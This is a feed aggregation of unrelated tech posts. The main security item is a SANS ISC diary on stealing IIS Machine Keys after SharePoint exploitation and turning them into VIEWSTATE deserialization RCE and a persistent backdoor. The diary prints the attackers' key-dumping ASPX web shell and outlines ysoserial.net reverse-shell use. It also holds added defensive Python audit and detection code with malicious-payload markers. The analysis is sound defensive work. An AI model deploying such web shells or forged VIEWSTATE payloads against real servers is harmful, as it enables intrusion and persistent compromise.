Why identity is the definitive cyber defense for federal agencies

Identity has become the new cybersecurity perimeter. As federal agencies rapidly adopt cloud services, AI-powered tools and hybrid work models, identity security is now central to mission assurance.

However, for many federal leaders, identity management remains a complex puzzle. The abundance of tools — from password managers to identity governance systems — often leads to fragmented environments and operational gaps. Even when agencies understand its importance, aligning identity investments with mission objectives remains a significant hurdle.

Daniel Wilbricht is President of Optiv + ClearShark.

Adding to this complexity is a rapidly evolving environment in which cyber threats are becoming more sophisticated. AI-driven attacks mimic human behavior, bypassing traditional defenses with alarming speed. Static controls and perimeter-centric thinking can’t keep up. Identity governance, behavioral analytics and adaptive access controls must work in tandem to stay ahead of AI-enabled threats.

Federal agencies need integrated, adaptive identity architectures that continuously verify users and devices in real time. Implementing these layered protections not only improves security but also enhances user experience by adapting to risk in real time. In addition, agencies that adopt these capabilities are better equipped to defend against emerging threats without sacrificing efficiency.

A trusted partner for identity security

That’s where Optiv + ClearShark makes a difference. We bring a cybersecurity-first approach to identity, helping federal agencies reduce risk, meet compliance and streamline operations. Unlike one-size-fits-all providers, we help agencies optimize their existing investments — whether they use SailPoint, BeyondTrust, Ping or Okta. Our team understands how to integrate these technologies into a framework that fits the federal context. In other words, we tailor solutions to the mission, not the other way around.

In fact, our edge lies in our people. Many of our consultants and engineers are former federal employees with clearances and firsthand experience navigating agency environments. Their insights help bridge the gap between vendor capabilities and federal mission needs.

In the past 18 months, we’ve delivered managed identity services across the defense and intelligence communities. These solutions include secure monitoring and identity operations in highly classified cloud environments, supported through partnerships with AWS, Splunk and others.

By offloading infrastructure and operations to our cleared teams, agencies gained enhanced identity assurance and significant cost savings while maintaining full compliance with federal security standards.

Accelerating modernization with confidence

Modernization doesn’t need to come at the expense of security or compliance. A pilot-driven approach allows agencies to validate identity solutions in their own environments before scaling. This reduces risk, accelerates return on investment and ensures audit readiness.

For example, one civilian agency we supported had invested heavily in identity tools but continued to fail penetration tests and struggled with governance gaps between identity and security teams. By deploying SailPoint and BeyondTrust in a phased, integrated rollout and aligning the solution to compliance and security objectives, we helped the agency pass red team exercises, reduce manual identity processes and establish a scalable identity framework for future growth.

The mission starts with identity

Identity is the most targeted attack surface in federal IT today. Protecting it is not just an IT imperative; it’s a mission-critical requirement. But success requires more than tools. It requires deep expertise, integration and continuous improvement.

With the right strategy and trusted support, agencies can secure their identity infrastructure, meet audit requirements, and modernize with purpose. The stakes have never been higher, and identity has never mattered more in federal cybersecurity.

Learn more about how Optiv + ClearShark takes a cybersecurity-centric approach to identity management for government.

This article was sponsored by Optiv + ClearShark.

The post Why identity is the definitive cyber defense for federal agencies appeared first on CyberScoop.

from CyberScoop https://ift.tt/CxsNh3Q
via IFTTT

Introducing Amazon Elastic VMware Service for running VMware Cloud Foundation on AWS

Today, we’re announcing the general availability of Amazon Elastic VMware Service (Amazon EVS), a new AWS service that lets you run VMware Cloud Foundation (VCF) environments directly within your Amazon Virtual Private Cloud (Amazon VPC). With Amazon EVS, you can deploy fully functional VCF environments in just hours using a guided workflow, while running your VMware workloads on qualified Amazon Elastic Compute Cloud (Amazon EC2) bare metal instances and seamlessly integrating with AWS services such as Amazon FSx for NetApp ONTAP.

Many organizations running VMware workloads on premises want to move to the cloud to benefit from improved scalability, reliability, and access to cloud services, but migrating these workloads often requires substantial changes to applications and infrastructure configurations. Amazon EVS lets customers continue using their existing VMware expertise and tools without having to re-architect applications or change established practices, thereby simplifying the migration process while providing access to AWS’s scale, reliability, and broad set of services.

With Amazon EVS, you can run VMware workloads directly in your Amazon VPC. This gives you full control over your environments while being on AWS infrastructure. You can extend your on-premises networks and migrate workloads without changing IP addresses or operational runbooks, reducing complexity and risk.

Key capabilities and features

Amazon EVS delivers a comprehensive set of capabilities designed to streamline your VMware workload migration and management experience. The service enables seamless workload migration without the need for replatforming or changing hypervisors, which means you can maintain your existing infrastructure investments while moving to AWS. Through an intuitive, guided workflow on the AWS Management Console, you can efficiently provision and configure your EVS environments, significantly reducing the complexity to migrate your workloads to AWS.

With Amazon EVS, you can deploy a fully functional VCF environment running on AWS in a few hours. This process eliminates many of the manual steps and potential configuration errors that often occur during traditional deployments. Furthermore, with Amazon EVS you can optimize your virtualization stack on AWS. Because the VCF environment runs inside your VPC, you have full root access to the environment and the associated management appliances. You can also integrate third-party solutions, from external storage such as Amazon FSx for NetApp ONTAP or Pure Cloud Block Store to backup solutions such as Veeam Backup and Replication.

The service also gives you the ability to self-manage or work with AWS Partners to build, manage, and operate your environments. This provides you with flexibility to match your approach with your overall goals.

Setting up a new VCF environment

Organizations can streamline their setup by making sure all the necessary prerequisites are in place before creating a new VCF environment. These prerequisites include an active AWS account, the appropriate AWS Identity and Access Management (IAM) permissions, and an Amazon VPC with sufficient CIDR space and two Route Server endpoints, each with its own peer. Additionally, customers will need to have their VMware Cloud Foundation license keys ready, secure Amazon EC2 capacity reservations specifically for i4i.metal instances, and prepare their VLAN subnet plan.

To help ensure a smooth deployment process, we’ve provided a Getting started hub, which you can access from the EVS homepage as well as a comprehensive guide in our documentation. By following these preparation steps, you can avoid potential setup delays and ensure a successful environment creation.

Screenshots of EVS onboarding

Let’s walk through the process of setting up a new VCF environment using Amazon EVS.

Screenshots of EVS onboarding

You will need to provide your Site ID, which is allocated by Broadcom when purchasing VCF licenses, along with your license keys. To ensure a successful initial deployment, you should verify you have sufficient licensing coverage for a minimum of 256 cores. This translates to at least four i4i.metal instances, with each instance providing 64 physical cores.

This licensing requirement helps you maintain optimal performance and ensures your environment meets the necessary infrastructure specifications. By confirming these requirements upfront, you can avoid potential deployment delays and ensure a smooth setup process.

Screenshots of EVS onboarding

Once you have provided all the required details, you will be prompted to specify your host details. These are the underlying Amazon EC2 instances that your VCF environment will get deployed in.

Screenshots of EVS onboarding

Once you have filled out details for each of your host instances, you will need to configure your networking and management appliance DNS details. For further information on how to create a new VCF environment on Amazon EVS, follow the documentation here.

Screenshots of EVS onboarding

After you have created your VCF environment, you will be able to look over all of the host and configuration details through the AWS Console.

Additional things to know

Amazon EVS currently supports VCF version 5.2.1 and runs on i4i.metal instances. Future releases will expand VCF versions, licensing options, and more instance type support to provide even more flexibility for your deployments.

Amazon EVS provides flexible storage options. Your Amazon EVS local Instance storage is powered by VMware’s vSAN solution, which pools local disks across multiple ESXi hosts into a single distributed datastore. To scale your storage, you can leverage external Network File System (NFS) or iSCSI-based storage solutions. For example, Amazon FSx for NetApp ONTAP is particularly well-suited for use as an NFS datastore or shared block storage over iSCSI.

Additionally, Amazon EVS makes connecting your on-premises environments to AWS simple. You can connect from an on-premises vSphere environment into Amazon EVS using a Direct Connect connection or a VPN that terminates into a transit gateway. Amazon EVS also manages the underlying connectivity from your VLAN subnets into your VMs.

AWS provides comprehensive support for all AWS services deployed by Amazon EVS, handling direct customer support while engaging with Broadcom for advanced support needs. Customers must maintain AWS Business Support on accounts running the service.

Availability and pricing

Amazon EVS is now generally available in US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Frankfurt), Europe (Ireland), and Asia Pacific (Tokyo) AWS Regions, with additional Regions coming soon. Pricing is based on the Amazon EC2 instances and AWS resources you use, with no minimum fees or upfront commitments.

To learn more, visit the Amazon EVS product page.

from AWS News Blog https://ift.tt/EaYqj6r
via IFTTT

Best Computer Monitors for the Productive Home Office (2026)

Introduction

Setting up a high-performance home office in 2026 means more than just a good chair and fast internet — your monitor is the centerpiece of your workspace. Whether you’re managing cybersecurity alerts, editing high-res media, analyzing dashboards, or simply juggling multiple windows, the right display can make or break your workflow.

In this guide, we’ve rounded up the best home office monitors for different use cases — including 4K USB-C monitors, ultrawide displays for multitasking, and affordable options for secondary setups. Each monitor here has been selected for its balance of resolution, ergonomics, connectivity, and value, so you can focus on productivity without compromise.

Let’s dive into some of the top monitors that can transform your desk into a command center.

Dell P2725QE 27” 4K UHD Monitor

The Dell P2725QE offers crisp 4K resolution and a fully adjustable stand, making it perfect for home office professionals who value detail and ergonomics. With USB-C connectivity delivering 90W power, built-in USB ports, and a sleek design, it doubles as both a monitor and a docking station for your laptop.

  • 27″ 4K UHD (3840×2160) IPS Display
  • USB-C with 90W Power Delivery
  • 99% sRGB, HDR support
  • Ergonomic stand with height, tilt, swivel
  • Built-in USB-C Hub for peripherals

Check Price on Amazon

LG 34WN80C-B 34” UltraWide

Ideal for multitaskers and cybersecurity analysts, the LG 34WN80C-B provides a 3440×1440 ultra-wide canvas for dashboards, terminal windows, and browser tabs. The USB-C port delivers 60W of power, and its HDR10 and IPS panel make it a reliable, visually stunning productivity powerhouse.

  • 34″ UltraWide QHD (3440×1440)
  • 99% sRGB, HDR10, IPS
  • USB-C with 60W PD
  • Great for multitasking/dashboards

Check Price on Amazon

ASUS ProArt Display PA278CGV

Designed for creative pros and engineers alike, the ASUS ProArt PA278CGV features factory-calibrated color accuracy (100% sRGB, Rec.709) and smooth 75Hz refresh. It includes USB-C, DisplayPort daisy-chaining, and an ergonomic stand, making it ideal for designers, coders, and content creators who demand precision.

  • 27″ QHD IPS, 100% sRGB & Rec.709
  • USB-C with 65W Power Delivery
  • Calman Verified Color Accuracy
  • Ideal for creative professionals

Check Price on Amazon

Acer CB272 27” Budget Monitor

The Acer CB272 is a budget-friendly monitor that delivers solid performance for everyday tasks. With a 1080p IPS display, slim bezels, and a 75Hz refresh rate, it’s a great choice as a secondary screen or for users who need a clean, reliable setup without spending a fortune.

  • 27″ Full HD IPS (1920×1080)
  • up to 120Hz Refresh Rate, Slim Bezel
  • Adjustable Ergonomic Stand
  • Great value for secondary use

Check Price on Amazon

Final Thoughts: Choosing the Right Monitor for Your Home Office

Your monitor isn’t just a screen — it’s a daily tool that directly impacts your efficiency, comfort, and focus. Whether you’re handling sensitive cybersecurity operations, designing content, or managing meetings and multitasking, investing in the right display pays off in productivity.

For sharp visuals and future-ready connectivity, the Dell P2725QE offers a 4K experience with USB-C power and clarity. If you need more screen real estate, the LG 34WN80C-B delivers ultrawide versatility perfect for analysts and multitaskers. Creative professionals will love the color precision of the ASUS ProArt PA278CGV, while the Acer CB272 remains a reliable choice for budget-conscious setups.

No matter your role or workspace size, there’s a monitor here to level up your home office. Pick the one that fits your workflow — and start working smarter, not harder.


Stealing Machine Keys for fun and profit (or riding the SharePoint wave), (Tue, Aug 5th)

About 10 days ago, exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused – we wrote about that here and here.

The original SharePoint vulnerability is a deserialization vulnerability that allowed an attacker to execute arbitrary commands – while these could be literally anything, the majority of exploits that we analyzed resulted in attackers dropping an ASPX file that just revealed the IIS Machine Key to them. This prompted me to dive a bit deeper into how this can be abused.

What are IIS Machine Keys?

A Machine Key in IIS and ASP.NET is a configuration setting used to ensure the security and integrity of data exchanged between the server and clients.

Basically, it is responsible for validating and encrypting sensitive data such as VIEWSTATE, cookies, and session state, protecting them from tampering or unauthorized access. An IIS administrator can define specific Machine Key settings – there are many possible ways to configure all of this, but for this diary we will look into VIEWSTATE protection.

VIEWSTATE is a mechanism used in ASP.NET Web Forms to persist the state of controls and page data between postbacks (i.e., between user actions that send the page back to the server). It allows a developer to easily store values of various controls after a form has been submitted. VIEWSTATE is always used by an IIS ASP.NET application.

Since VIEWSTATE can hold sensitive information, it should be appropriately protected. And this is where Machine Keys come into the game – they are used by IIS to prevent tampering of VIEWSTATE and (optionally) encrypt its contents.

By default, IIS (even the very latest version on Windows server 2025) will enable VIEWSTATE MAC (Message Authentication Code) validation but will leave encryption on “Auto” which means that it is not used, as shown in the figure below:

This is not too big of a problem, unless a developer decides to store something confidential in VIEWSTATE.

The Machine Key, as you can probably guess by now, is what performs this validation – and by default SHA1 is used. Several other algorithms are supported, with HMACSHA256 being the second most commonly used one.

Machine Key handling

Since the Machine Key is used to validate VIEWSTATE integrity, it is obviously a very important security element. If an attacker gets the Machine Key of a server, they can modify VIEWSTATE (and cookies) to arbitrary values and calculate a proper MAC, which could allow them to perform all sorts of abuse – even achieve remote code execution, as we will demonstrate later.

So, how does one handle this? The whole setup can get a bit complex depending on which account IIS is running under, but in the most common setups, one of the following two approaches is used:

  • The Machine Key is automatically generated by IIS. This is the default setup (the one you can see in the image above), and in this case the Machine Key is stored in the Registry.
  • The Machine Key is generated by an administrator and stored in the web.config file. This is actually mandatory if you have a farm of servers behind a load balancer that need to be able to share sessions, so such a setup is quite common!

Stealing a Machine Key

An attacker’s ultimate prize is to steal a Machine Key used by the target IIS server. So, how can they achieve that?

If the Machine Key is stored in a web.config file, in the majority of cases it will be stored there in plain text! While it’s possible to encrypt the config section, this is very rarely done. In other words, an attacker that can fetch the web.config file can basically pwn the whole server! This can be done, for example, through LFI (Local File Inclusion) or XXE (XML External Entities) vulnerabilities that allow the attacker to fetch the contents of files.
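As an added example (not code from the diary), a small Python audit of the <machineKey> element in a web.config: it reports whether the key is static and stored in plain text, whether the section has been protected with a configuration provider, and which validation algorithm is configured. The three sample configs are constructed for illustration; the protected one only shows the wrapper that aspnet_regiis -pe leaves behind, with a placeholder instead of real ciphertext.

```python
"""Audit the <machineKey> element of an ASP.NET web.config.
Added example: flags a static key kept in plain text, legacy validation,
and reports whether keys are auto-generated (registry-backed) instead."""
import xml.etree.ElementTree as ET

# Constructed sample: farm-style static Machine Key, stored in plain text.
WEAK_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="Auto" />
  </system.web>
</configuration>"""

# Constructed sample: the same section after `aspnet_regiis -pe "system.web/machineKey"`.
# The CipherValue is a placeholder; a real one is a long base64 blob.
PROTECTED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData xmlns="http://www.w3.org/2001/04/xmlenc#">
        <CipherData><CipherValue>PLACEHOLDER_CIPHERTEXT</CipherValue></CipherData>
      </EncryptedData>
    </machineKey>
  </system.web>
</configuration>"""

# Constructed sample: no explicit keys, so IIS auto-generates them (registry-backed).
AUTO_CONFIG = """<?xml version="1.0"?>
<configuration><system.web><compilation debug="false" /></system.web></configuration>"""

LEGACY_VALIDATION = {"SHA1", "MD5"}  # the diary notes SHA1 is the default; HMACSHA256 is preferred


def audit_machine_key(config_xml: str) -> dict:
    """Return provisioning facts about <machineKey> plus a list of findings."""
    root = ET.fromstring(config_xml)
    mk = next(root.iter("machineKey"), None)
    result = {"present": mk is not None, "protected_section": False,
              "static_key": False, "isolate_apps": False,
              "validation": None, "decryption": None, "findings": []}
    if mk is None:
        result["findings"].append(
            "no <machineKey>: keys are auto-generated and live in the registry; "
            "regenerate them after any code execution on this host")
        return result
    encrypted_child = any(c.tag.rsplit("}", 1)[-1] == "EncryptedData" for c in mk)
    if mk.get("configProtectionProvider") or encrypted_child:
        # Section is protected with a configuration provider: reading the file
        # alone does not expose the key (code execution on the host still can).
        result["protected_section"] = True
        return result
    vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
    dkey = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
    result["validation"] = mk.get("validation")
    result["decryption"] = mk.get("decryption")
    result["isolate_apps"] = "ISOLATEAPPS" in (vkey + dkey).upper()
    result["static_key"] = not (vkey.upper().startswith("AUTOGENERATE")
                                and dkey.upper().startswith("AUTOGENERATE"))
    if result["static_key"]:
        result["findings"].append(
            "static validationKey/decryptionKey stored in plain text: anyone who can "
            "read web.config (LFI, XXE, backups) can forge VIEWSTATE; protect the section "
            "with aspnet_regiis -pe \"system.web/machineKey\" and rotate the key")
    if result["validation"] in LEGACY_VALIDATION:
        result["findings"].append(
            f"validation={result['validation']} (legacy); prefer HMACSHA256 or stronger")
    if result["isolate_apps"]:
        result["findings"].append(
            "IsolateApps: each application derives its own key from the base key")
    return result


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("protected", PROTECTED_CONFIG), ("auto", AUTO_CONFIG)):
        r = audit_machine_key(cfg)
        print(name, {k: v for k, v in r.items() if k != "findings"})
        for f in r["findings"]:
            print("  -", f)
```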

If the Machine Key is automatically generated, it is stored in the Registry, which means that the attacker needs code execution on the server to fetch it. One important thing should be stressed here: there is nothing that can be done to prevent them from reading the Machine Key, provided they get code execution, even through ASPX files!

Back to our SharePoint story – once the original attackers exploited a vulnerable SharePoint server, they uploaded the following ASPX file:

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
    var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
    var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
    var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
    var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
    Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>

What does this script do? It will try to read the web.config file and will display both the validation and encryption keys, together with the modes in use. If a Machine Key was stored in web.config, it would be leaked to an attacker, as shown in the image below:

With the Machine Key available, the attacker can now achieve RCE on the affected server, due to the way deserialization of VIEWSTATE works (and this is a feature!) – more about that further below, but let’s first see the other case, when the Machine Key is automatically generated and not stored in web.config:

Oh! No luck for the attacker, this script was not able to fetch the Machine Key. Phew, all good, we do not have to do anything … or do we? Remember that I wrote above that automatically generated Machine Keys are stored in the Registry. Is there anything preventing the attacker from dropping a slightly better ASPX file that can read the Registry?

Unfortunately NOT, as Soroush Dalili wrote in their fantastic blog here – one can simply read the key, no matter where it is stored. Soroush published a small ASPX file that goes through all potential locations of a Machine Key.

Clearly the SharePoint attackers either did not care about other locations (and were happy with the web.config ones), or did not know about this, but if you use Soroush’s script, you can fetch the Machine Key even when it’s automatically generated, as shown for the same application I am using as a proof of concept below:

The bottom line is this: if anyone gets any code execution on an IIS server, you absolutely need to regenerate the server’s Machine Key. Windows will not do this automatically for you, and this key persists through reboots!

Remote Code Execution

So what can one do with Machine Key now?

While we can modify values in VIEWSTATE (it is a bit difficult to read it as it’s serialized, but not impossible, of course), one can also use Alvaro Munoz’s fantastic ysoserial.net, which has builtin support for generating VIEWSTATE objects.

Now that we have a valid Machine Key, ysoserial.net allows us to create an object which, upon deserialization on the server side, will execute code. Since the MAC will be valid (and the object even encrypted, if needed), IIS will happily try to deserialize it with the LosFormatter class, which will ultimately allow for Remote Code Execution through deserialization, as there are known gadgets that can be used here.

There are two key points here:

  1. There is nothing an administrator can do to prevent this if an attacker has a valid Machine Key
  2. A malicious VIEWSTATE parameter can be used with *any* ASPX script on the server, it does not need to be the originally vulnerable one. There are some caveats on how to produce a valid VIEWSTATE parameter based on application path, but there are many other resources that explain how to do this.

To reiterate – once an attacker has a valid Machine Key they basically have a backdoor to the IIS server that they can use at any point in time, as long as the Machine Key has not been changed!

PoC || GTFO

Let’s demonstrate this. I have a very simple application that allows a user to input their name (and will use it in a diary in the future as well), that looks like this:

When the Submit button is clicked, the following request is sent:

Now, the IIS server that I have set up is using automatically generated Machine Keys, to make exploitation a bit more interesting (notice I didn’t say difficult). When using the script that Soroush posted, the following information can again be seen:


This leaves us with all information needed to exploit this server.

We will use ysoserial.net to do this, specifically with following options:

  • The plugin we will use will be ViewState, which will allow us to generate a malicious VIEWSTATE object, provided we know the Machine Key
  • The gadget chain will be TextFormattingRunProperties – it usually generates the shortest payload and supports LosFormatter
  • The command will be our PowerShell, which will connect to our Netcat listener
  • Finally we will need to provide the following:
    • The validation key is the Machine Key from above. I will be using an application-specific validation key: besides the Machine Key being automatically generated, the server is using IsolateApps, so every application has its own Machine Key, derived from the initial one
    • The validation algorithm will be HMACSHA256
    • My path and apppath will correspond to the application I am attacking (see Soroush’s post for more information about this)
    • Finally I am using the algorithm suitable for .NET 4.0


All we need to do now is go back and resend the request, but this time with our malicious VIEWSTATE object:

The response will be 500 Internal Server Error, but that’s what we want:

And we get our reverse shell happy dance:

Finally, the attacker can now use this malicious VIEWSTATE object on any page that belongs to this application, no matter what other parameters are sent as IIS will first try to deserialize the received VIEWSTATE object. And that’s their persistent backdoor.

Detection

IIS will at least log an event when VIEWSTATE verification has failed. "Failed" here does not mean that the MAC was incorrect (that is silently ignored); it means that the verification process itself failed, which is what happens when deserialization is exploited.

The full VIEWSTATE object is logged, which also allows you to inspect what has happened. If you do not already, make sure that you are monitoring Event Code 4009 in the Windows Application log. Such an event will look as shown below:
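As an added example (not part of the diary), a small Python triage script over a constructed export of Event Code 4009 records: it parses the ViewStateException fields, decodes the logged VIEWSTATE, flags payloads that carry the gadget and command strings mentioned above, and counts failures per client. The record layout, field names, IP addresses and VIEWSTATE blobs are constructed to approximate the event text, not copied from a real log; adjust the field regexes to your own export format.

```python
"""Triage ASP.NET 'Viewstate verification failed' events (Event code 4009).
Added example: parses the ViewStateException block, decodes the logged
VIEWSTATE and rates each event. All sample data below is constructed."""
import base64
import binascii
import re
from collections import Counter

# Constructed VIEWSTATE blobs. ObjectStateFormatter output starts with 0xFF 0x01.
BENIGN_VS = base64.b64encode(b"\xff\x01\x0f\x05name\x05Bojan").decode()
SUSPECT_VS = base64.b64encode(
    b"\xff\x01" + b"\x00" * 8
    + b"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"
    + b"\x00" * 8 + b"powershell -e AAAA").decode()

# Constructed log export: two 4009 events from one client (203.0.113.7 is a documentation address).
SAMPLE_LOG = f"""Event code: 4009
Event message: Viewstate verification failed. Reason: The viewstate supplied failed integrity check.
Event time: 2025-08-05 10:21:33
ViewStateException information:
    Exception message: Invalid viewstate.
    Client IP: 203.0.113.7
    Port: 51234
    Referer: 
    Path: /app/Default.aspx
    User-Agent: Mozilla/5.0
    ViewState: {BENIGN_VS}

Event code: 4009
Event message: Viewstate verification failed. Reason: Viewstate was invalid.
Event time: 2025-08-05 10:21:41
ViewStateException information:
    Exception message: Invalid viewstate.
    Client IP: 203.0.113.7
    Port: 51240
    Referer: 
    Path: /app/About.aspx
    User-Agent: python-requests/2.32
    ViewState: {SUSPECT_VS}
"""

FIELDS = ("Event time", "Client IP", "Path", "User-Agent", "ViewState")
# Strings that appear in clear text inside serialized gadget payloads.
GADGET_MARKERS = (b"TextFormattingRunProperties", b"System.Diagnostics.Process",
                  b"powershell", b"cmd.exe")


def parse_4009_events(text: str) -> list:
    """Split an exported log into 4009 records and pull out the useful fields."""
    events = []
    for chunk in re.split(r"(?m)^Event code: 4009\s*$", text)[1:]:
        ev = {}
        for field in FIELDS:
            m = re.search(rf"(?m)^\s*{re.escape(field)}:\s*(.*?)\s*$", chunk)
            ev[field] = m.group(1) if m else ""
        events.append(ev)
    return events


def triage(ev: dict) -> dict:
    """Decode the logged VIEWSTATE and rate the event."""
    try:
        raw = base64.b64decode(ev["ViewState"], validate=True)
    except (binascii.Error, ValueError):
        return {"severity": "medium", "reason": "VIEWSTATE is not valid base64"}
    hits = [m.decode() for m in GADGET_MARKERS if m in raw]
    osf = raw.startswith(b"\xff\x01")  # ObjectStateFormatter marker bytes
    if osf and hits:
        return {"severity": "high", "reason": "serialized payload contains " + ", ".join(hits)}
    if len(raw) > 4096:
        return {"severity": "medium", "reason": f"unusually large VIEWSTATE ({len(raw)} bytes)"}
    return {"severity": "low", "reason": "integrity failure without payload indicators"}


def report(text: str) -> list:
    """Triage every event and attach a per-client failure count (bursts are a signal)."""
    events = parse_4009_events(text)
    per_ip = Counter(ev["Client IP"] for ev in events)
    return [dict(ev, **triage(ev), failures_from_ip=per_ip[ev["Client IP"]]) for ev in events]


if __name__ == "__main__":
    for row in report(SAMPLE_LOG):
        print(row["severity"].upper(), row["Client IP"], row["Path"], row["reason"],
              f"(failures from this IP: {row['failures_from_ip']})")
```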


Bojan

INFIGO IS | An Allurity Group member

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

from SANS Internet Storm Center, InfoCON: green https://ift.tt/wsF84B2
via IFTTT

New Feature: Daily Trends Report, (Mon, Aug 4th)

I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback 🙂

There are two ways to receive the report:

  1. E-Mail: Sign up at https://ift.tt/IxmXz8l 
  2. JSON/HTTP: You may also just download the raw JSON data for the report at https://ift.tt/8cL5Jqv

The sections of the report:

  • Top 10 newly registered domains, based on our domain score (the higher, the more suspect)
  • Top 10 URLs: The top 10 newly seen URLs from our web honeypot.
  • Top 10 New SSH/Telnet usernames: Usernames our Cowrie honeypots have not seen before.
  • Top 10 Trending ports

The layout will be refined for sure. Let me know if the data is useful.

Can't receive the email? E-mail delivery has always been an issue, which is why we offer the HTML report as well.


daily trends reports snippet


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

from SANS Internet Storm Center, InfoCON: green https://ift.tt/xXeRhJ4
via IFTTT